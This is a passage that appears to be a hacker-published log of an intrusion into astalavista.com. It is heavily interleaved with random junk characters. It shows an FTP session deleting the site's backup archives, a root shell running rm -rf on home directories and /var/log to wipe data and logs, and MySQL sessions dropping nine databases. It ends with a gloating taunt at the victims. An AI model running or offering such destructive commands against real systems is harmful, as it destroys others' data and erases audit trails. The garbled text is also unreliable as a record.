A% w+ z: r1 b; H9 l0 f8 C2 O# VUsing binary mode to transfer files.
% w; ]! X# ~: ?9 S7 Oftp> ls -la. |5 ]# @ ?: q% J+ b8 N& T6 s
227 Entering Passive Mode (212,254,194,163,2,188): u- t [4 } e5 ^2 a3 K E2 X# P
150 Opening BINARY mode data connection for ‘file list’.! y" w3 d0 N D
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
2 o9 O0 {% e( X2 J) ~$ M$ G226 Transfer complete.
: i( k/ w0 A6 t! W, Y( G1 Rftp> cd astalavista.com
( y2 l Y4 U7 _/ A9 \1 _250 CWD command successful.
d$ B! ?- {2 z. `' Aftp> ls -la2 p& Q1 S, Q* X- v! |' q
227 Entering Passive Mode (212,254,194,163,2,189)* f3 i5 {. G& n5 ?+ _* ^/ F9 [
150 Opening BINARY mode data connection for ‘file list’.
! U' d `# }. b2 e-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar4 }$ A" A; w+ t( k
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2. j' }( m$ }- k# R; w- C
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
3 S- M" A, E' T% F-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar1 F+ V/ d0 I4 t) @* ?
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
1 o1 r5 {6 P6 [[snip]
/ V+ M, ^! D: ?1 _# Q226 Transfer complete.
# X0 |# i+ `( z* b& P. [ftp> mdelete *
6 x1 S! c* K5 S1 Gftp> ls -la$ G8 N; H! g0 D9 R5 U- U
227 Entering Passive Mode (212,254,194,163,2,193)
! U, R/ K2 ~. e150 Opening BINARY mode data connection for ‘file list’.
* x- o* j! Z% f4 M226 Transfer complete.' D* g. I5 R. @5 b
ftp>3 E b2 H$ d5 Z* c8 ~" G" f
9 }7 H) |- T3 R& p6 B# ~sh-3.2# cd /home8 b2 Y& q3 f( w4 a
sh-3.2# ls -la
: @- F& x& s* C1 p! L$ w5 ?( W5 _9 Jtotal 120 f3 f* g# W# `; B" ^( L) r$ ]; z. @
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
6 H5 r: ~) ^9 W' Odrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
9 m$ b( c [" b5 l' tdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin0 W+ s! p2 N; ?; n
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
4 V; b3 F, I5 c. ^7 f-rw——- 1 root root 8192 Jun 3 02:45 aquota.user3 j( Q" \' |3 _6 y( U
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
/ Z& N, z4 r) }2 Rdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup: A! `9 N' q/ i, D0 |2 t
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
* X% F6 Z1 I; S. `4 P9 _+ F! Adrwx–x–x 10 com com 4096 Apr 28 12:40 com
' G. _! `+ S, T( P% c- o7 _drwxr-xr-x 2 root root 4096 May 17 2007 ftp
" E1 I* n$ d$ R7 [% N: T/ [drwx—— 3 jon jon 4096 Sep 21 2007 jon
Y* K9 Q$ c, o2 `0 T& o) Kdrwx—— 2 root root 16384 Sep 11 2007 lost+found0 ]5 C0 G" X' [$ y8 [( c6 {
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
9 |4 r: H9 o; d# n4 { ddrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata/ G# v/ M, E5 u) m/ R
drwx—— 2 jon jon 4096 Sep 15 2007 test
; _. b p4 v, I$ Bdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
5 P) L2 L, x+ P8 J5 s% O8 d7 u) p& N+ Q \" @9 F9 U! v& l
sh-3.2# rm -rf backup/& J" D$ D) K: Q
sh-3.2# rm -rf backup.14161/
8 {% o, d1 o2 w% e% ^: H7 W0 nsh-3.2# rm -rf ftp/2 E: [ n# u( e5 y7 N
sh-3.2# rm -rf jon/2 J' G" s& S8 E1 Z
sh-3.2# rm -rf my/
X; X- a; x- k9 I b$ Ish-3.2# rm -rf mysqldata/
: P9 z6 Q9 h4 ` {* G$ D/ Rsh-3.2# rm -rf test/
$ [, Z: ?: P, X( F8 x6 r1 P+ y& v" _% xsh-3.2# rm -rf tmp/- ]7 u" t8 m" n& ~$ J' h* t
sh-3.2# cd ~# ]$ t5 {: }. }8 J
sh-3.2# rm -rf *
$ Y3 W) N/ L8 o( U# Fsh-3.2# rm -rf /var/log/, K( W( ~, `" ~$ `$ H
rm: cannot remove directory `/var/log//proftpd’: Directory not empty
# R, _/ k! Y9 q4 Esh-3.2# rm -rf /home/*5 o0 V* A9 J, N/ S, B% m! N
sh-3.2# mysql
1 L, U) y( J' H# FWelcome to the MySQL monitor. Commands end with ; or \g.1 ~' [+ L8 F" \) m5 r
Your MySQL connection id is 407156
; V" y/ b% W. o5 v8 `6 F9 W* tServer version: 5.0.45-community-log MySQL Community Edition (GPL)
+ Z* K5 n! B5 t( z0 d* B k
- G" a- d7 z+ Q! C. W, Y1 uType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.9 p( ?7 i& R0 L$ w
! L* x8 R0 J; i/ omysql> show databases;0 P. e& g% D* u3 e, |! R0 u
+———————–+& D/ p& }6 n4 ^2 B
| Database |
1 x% D2 M" |2 d4 v( y z" t' u$ S+———————–+: G# W6 Y; j' }
| information_schema |2 Y9 O3 X# j, n+ O H/ `: b
| astanet_ads |5 l. i1 F0 N" ?9 h; Q% ?# B9 x
| astanet_mailing_lists |
2 q4 Z/ S& d1 u/ |( g| astanet_mediawiki |: G* w0 T8 M& a# j0 V& \- G
| astanet_membersystem |) R# d% [0 q; y# k) J
| com_contrexx |' _6 w) `: e( F3 K" l0 y2 A
| com_contrexx2 |
7 j% B* m5 l* n4 l| com_contrexx2_live |7 g1 a% z0 Y4 r+ n. D
| da_roundcube |) f. ~, W$ {0 x7 \
| dolphin |
! M0 f; |/ T. U8 v/ h2 Y7 K| ideapool |
' V' P0 G4 h+ T/ K* H: n| mysql |: J( ^0 g. w/ G. X0 @: [
| test |; w' h1 J& t3 H! ^8 P) `
| yourmaster |
6 D. [6 T( U* Q# V$ O u+———————–+6 p/ Z. o! {: W/ v" n; f
14 rows in set (0.03 sec)
6 n3 q' f9 f3 l! k! Q
$ q. v: l* d& v' o) @ Z) pmysql> drop database astanet_membersystem;
8 v, x2 O1 X" s% ]5 u1 D& Z; c4 SdroQuery OK, 46 rows affected (0.81 sec)
6 A2 k1 F: r( @4 `) E/ a
" W3 i+ [/ }. w+ amysql> drop database com_contrexx;% t$ Y) a, S" F7 \: r& N N
Query OK, 211 rows affected (2.72 sec)
& _" }0 {+ i H+ Z
, S+ c* m6 N3 d, z: Xmysql> drop database com_contrexx2;8 F% e8 i8 l1 M {9 R/ W
Query OK, 237 rows affected (2.23 sec)
* z. h, J* B0 ?8 d/ j3 v1 M( N3 ^) u# P
mysql> drop database com_contrexx2_live;
2 v. B6 m' |: ?, Q4 }' L. SQuery OK, 227 rows affected (7.63 sec)
0 [2 ]" g$ U! R1 A
9 i s7 i" [: V) tmysql> drop database ideapool;
7 }: G" H: s+ _. R5 ]Query OK, 69 rows affected (0.19 sec)
/ ~ M3 c+ Y2 n) _; P& b1 K% D t9 ?/ _# h3 C& _% N* j
mysql> drop database yourmaster;
1 C# E( W2 I0 f, hQuery OK, 158 rows affected (0.55 sec)
+ \" L( |) x" f/ O: O6 ^# l: R
4 k2 F$ i" r/ u# Kmysql> drop database astanet_ads;
: B! d" r5 x, r$ p/ N, YQuery OK, 9 rows affected (0.11 sec)3 L7 N+ ~, g! E3 I% x
5 V$ I5 G! s! \5 r% C0 ^6 `7 r
mysql> drop database astanet_mailing_lists;
% i) | n. Z4 n b4 |4 zQuery OK, 24 rows affected (1.47 sec)
6 B! Q8 D) y: Z; @9 U$ Y+ e! I4 u* y! x5 a
mysql> drop database astanet_mediawiki;
: F% T, I8 L: [6 F$ t/ M8 I' Y- j. r! SQuery OK, 31 rows affected (0.51 sec)+ U6 ^) c& T1 s# g$ L/ Z1 B, n
9 \% Q. e( g* r0 T' P3 X ^7 G5 cmysql> show databases;# r! A! J4 M- \
+——————–+7 ~0 {9 M k$ _1 l/ C% D4 ~9 ]
| Database |
2 ^% ~7 o& z6 a+——————–+
# h- {7 S: G: I. F2 G/ y| information_schema |
' G2 y" j+ u9 s# g m3 K: @4 l| da_roundcube |
4 R) y6 N& p& W' [+ }& m3 G| dolphin |% [2 k( K0 u" J
| mysql |
0 h9 {" c3 n7 _: D" w| test |2 h3 @. {4 v0 k6 {+ Q
+——————–+
8 `! N, D% g+ R: Y5 ]5 rows in set (0.00 sec)
; m) U. p- ^. O+ E% V @1 A& D. K
6 j+ m9 }1 w8 O4 M6 t1 {What a journey! We’re not sure exactly why the “Terminator” had any influence on
" T8 v2 X( [5 m6 \; b( U, Ntheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the M l) A2 x K& V: V- k
wrong to say this pack of morons *wont be back*.2 J: E, F) ?- r6 b
|